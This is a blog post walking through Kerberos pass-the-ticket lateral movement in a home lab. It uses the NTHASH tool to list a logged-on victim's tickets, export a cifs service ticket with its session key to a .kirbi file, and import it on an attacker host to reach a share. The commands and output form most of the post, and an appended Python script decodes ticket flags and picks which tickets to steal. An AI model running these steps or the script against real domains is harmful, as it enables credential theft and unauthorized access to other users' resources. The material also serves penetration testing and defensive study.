<h1>Playing with Kerberos tickets and NTHASH</h1>

<p>Published 31 October 2022 at <a href="https://labalec.fr/erwan/?p=2387">https://labalec.fr/erwan/?p=2387</a> (categories: kerberos, nthash).</p>

<p>We will be discussing privilege escalation and/or lateral movement, done here by stealing an existing Kerberos ticket from a compromised host and replaying it elsewhere.</p>

<p><strong>The theory.</strong></p>

<p>You got yourself access to a host where other users (preferably local or domain admins) are logged on? Then:</p>

<ul>
<li>List the Kerberos ticket(s) of the session: <code>nthash-win64 /klist</code></li>
<li>Export the TGS ticket for the service you want to reach: <code>nthash-win64 /ask /input:service/fqdn</code>. The ticket is written, together with its session key, to a .kirbi file.</li>
<li>Import the (preferably TGS) ticket in another session, or on another host: <code>nthash-win64 /ptt /binary:ticket.kirbi</code></li>
</ul>

<p>Note 1: an admin can touch all tickets on the host, not only those of the current logon session, by passing the <code>luid</code> parameter with the logon ID of the target session.<br>
Note 2: if host2/attacker is a domain-joined computer, a TGT ticket may be enough: your host "should" obtain the TGS itself when you request a service. A stolen TGS, on the other hand, works from any host that can reach the service, domain-joined or not, which is what the example below shows.<br>
Note 3: this is not about requesting/forging a ticket (see Rubeus) but about stealing a ticket that already exists in the victim's session.<br>
Note 4: the exported .kirbi contains the session key, so the file is a credential in its own right: whoever holds it can act as the ticket's client towards that service until the ticket's EndTime.</p>

<p><strong>Practical example</strong>.</p>

<p><em>On host1/victim, we can witness that the logged-on user (user1) has access to a remote share.</em></p>

<pre>dir \\WIN-BBC4BS466Q5.home.lab\temp
 Volume in drive \\WIN-BBC4BS466Q5.home.lab\temp has no label.
 Volume Serial Number is 763C-BB7B

 Directory of \\WIN-BBC4BS466Q5.home.lab\temp

20/02/2022  21:21    &lt;DIR&gt;          .
20/02/2022  21:21    &lt;DIR&gt;          ..
27/07/2022  17:09         1 313 792 NTHASH-win64.exe
               1 File(s)      1 313 792 bytes
               2 Dir(s)     971 288 576 bytes free</pre>

<p><em>And indeed, there is a ticket which we may want to steal (cifs/WIN-BBC4BS466Q5.home.lab).</em></p>

<pre>nthash-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:32
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:krbtgt/home.lab
Client Name:user1
Flags:40E10000

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000</pre>

<p>The first entry is user1's TGT (service krbtgt/home.lab), the second the service ticket for the share. EncryptionType 0x12 is AES256-CTS-HMAC-SHA1-96. The flags are the RFC 4120 TicketFlags read as a 32-bit value: 40E10000 on the TGT means forwardable, renewable, initial, pre-authent and name-canonicalize; 40A50000 on the TGS means forwardable, renewable, pre-authent, ok-as-delegate and name-canonicalize. Both tickets expire on 01/11/2022 at 02:26:32, which is how long the stolen copy will be usable.</p>

<p><em>Let's export this ticket to a file (which we will be importing later on).</em></p>

<pre>nthash-win64.exe /ask /input:cifs/WIN-BBC4BS466Q5.home.lab
NTHASH 1.8 x64 by erwan2212@gmail.com
Asking for: cifs/WIN-BBC4BS466Q5.home.lab
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewUntil:07/11/2022 16:26:32
ServiceName: cifs/WIN-BBC4BS466Q5.home.lab
ClientName: user1
Flags: 40A50000
KeyType: 00000012
Key:C569A92747E0972A624943E4D99EF1D6BC7CADC7E379E928179BDE816DB419A3
TicketEncType: 00000012
Ticket:6182040630820402A003020105A10A1B08484F4D452E4C4142A22B3029A00302

* KiRBi to file:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi</pre>

<p>Note the <code>Key</code> line: that is the session key shared between user1 and the cifs service, and it is what makes the .kirbi usable by someone who is not user1 (see note 4 above).</p>

<p><em>On host2/attacker, we witness that we do not have (yet) access to the target remote share.</em></p>

<pre>dir \\WIN-BBC4BS466Q5.home.lab\temp
The user name or password is incorrect.</pre>

<p><em>Let's import our ticket (exported in the previous step).</em></p>

<pre>NTHASH-win64.exe /ptt /binary:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi
NTHASH 1.8 x64 by erwan2212@gmail.com
Ticket successfully submitted for current session</pre>

<p><em>Let's confirm that our ticket now appears in our current (attacker) session.</em></p>

<pre>NTHASH-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000</pre>

<p><em>Let's now finally confirm that we do have access to the remote share, although we are logged on as someone else and never learned user1's password: the server only checks that the ticket was issued under its own key and that we hold the matching session key, which the .kirbi gave us.</em></p>

<pre>dir \\WIN-BBC4BS466Q5.home.lab\temp
 Volume in drive \\WIN-BBC4BS466Q5.home.lab\temp has no label.
 Volume Serial Number is 763C-BB7B

 Directory of \\WIN-BBC4BS466Q5.home.lab\temp

20/02/2022  21:21    &lt;DIR&gt;          .
20/02/2022  21:21    &lt;DIR&gt;          ..
27/07/2022  17:09         1 313 792 NTHASH-win64.exe
               1 File(s)      1 313 792 bytes
               2 Dir(s)     971 296 768 bytes free</pre>
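<p>The step between <code>/klist</code> and <code>/ask</code> is deciding which ticket is worth exporting: a TGS for the service you need, still inside its validity window, or the TGT if the attacking host is domain joined. The script below is an added example and not code from the NTHASH project or from this post; it parses the post's own <code>/klist</code> listing (re-typed here as a constant), decodes the EncryptionType and Flags values the listing shows, and applies those two rules. The field names, the triage rules and the assumed clock are this example's assumptions.</p>

```python
"""Triage the tickets listed by `nthash-win64.exe /klist` before exporting one.

Added example, not code from the NTHASH project or the post's author. The
sample listing below is the post's own /klist output re-typed as a constant;
the field names, the triage rules and the `now` timestamp are assumptions.
"""
import re
from datetime import datetime

# TicketFlags bit positions (RFC 4120 section 5.3.1) as the 32-bit value
# Windows reports: bit 0 of the BIT STRING is the most significant bit.
TICKET_FLAGS = {
    0x40000000: "forwardable",
    0x20000000: "forwarded",
    0x10000000: "proxiable",
    0x08000000: "proxy",
    0x04000000: "may-postdate",
    0x02000000: "postdated",
    0x01000000: "invalid",
    0x00800000: "renewable",
    0x00400000: "initial",
    0x00200000: "pre-authent",
    0x00100000: "hw-authent",
    0x00080000: "transited-policy-checked",
    0x00040000: "ok-as-delegate",
    0x00020000: "anonymous",
    0x00010000: "name-canonicalize",
}

# Encryption type numbers (RFC 3961/3962; RC4 values from MS-KILE).
ENC_TYPES = {
    0x01: "DES-CBC-CRC",
    0x03: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96",
    0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC",
    0x18: "RC4-HMAC-EXP",
}

# Constructed sample: the listing shown in the post (victim host, user1).
SAMPLE_KLIST = """NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:32
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:krbtgt/home.lab
Client Name:user1
Flags:40E10000

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000
"""

TIME_FMT = "%d/%m/%Y %H:%M:%S"  # NTHASH prints local time as dd/mm/yyyy


def parse_time(text):
    """Turn a StartTime/EndTime/RenewTime value into a datetime."""
    return datetime.strptime(text, TIME_FMT)


def decode_flags(value):
    """Return the flag names set in a 32-bit TicketFlags value, MSB first."""
    return [name for bit, name in TICKET_FLAGS.items() if value & bit]


def parse_klist(text):
    """Parse /klist output into one dict per ticket; the banner is skipped."""
    tickets = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, sep, val = line.partition(":")
            if sep:
                fields[key.strip()] = val.strip()
        if "Server Name" not in fields:
            continue  # banner or unrelated text, not a ticket
        etype = int(fields["EncryptionType"], 16)
        service = fields["Server Name"]
        tickets.append({
            "service": service,
            "client": fields["Client Name"],
            "is_tgt": service.lower().startswith("krbtgt/"),
            "enctype": ENC_TYPES.get(etype, "unknown(0x%x)" % etype),
            "flags": decode_flags(int(fields["Flags"], 16)),
            "start": parse_time(fields["StartTime"]),
            "end": parse_time(fields["EndTime"]),
            "renew_until": parse_time(fields["RenewTime"]),
        })
    return tickets


def seconds_left(ticket, now):
    """Seconds until the ticket's EndTime (negative once it has expired)."""
    return int((ticket["end"] - now).total_seconds())


def export_candidates(tickets, now, attacker_domain_joined=False):
    """Service names worth passing to `/ask /input:<service>` on the victim.

    Every unexpired service ticket qualifies, since a TGS works from any host
    that can reach the service. The TGT is only useful if the attacker host
    can itself ask the KDC for service tickets, i.e. it is domain joined
    (the post's note 2), so it is listed only in that case.
    """
    picks = []
    for t in tickets:
        if not (t["start"] <= now < t["end"]):
            continue  # expired or not yet valid: importing it buys nothing
        if t["is_tgt"] and not attacker_domain_joined:
            continue
        picks.append(t["service"])
    return picks


if __name__ == "__main__":
    now = parse_time("31/10/2022 17:00:00")  # assumed clock on the victim
    tickets = parse_klist(SAMPLE_KLIST)
    for t in tickets:
        print("%s %s for %s: %s, %s, %ds left" % (
            "TGT" if t["is_tgt"] else "TGS", t["service"], t["client"],
            t["enctype"], "/".join(t["flags"]), seconds_left(t, now)))
    print("export:", export_candidates(tickets, now))
```

<p>Run against the post's listing with the clock at 17:00 on 31/10/2022, the report shows the TGT and the cifs TGS both as AES256 tickets with about 9.5 hours left, and recommends exporting only <code>cifs/WIN-BBC4BS466Q5.home.lab</code> unless the attacking host is domain joined. Feeding it a listing captured on a real engagement only requires replacing the constant with the tool's output.</p>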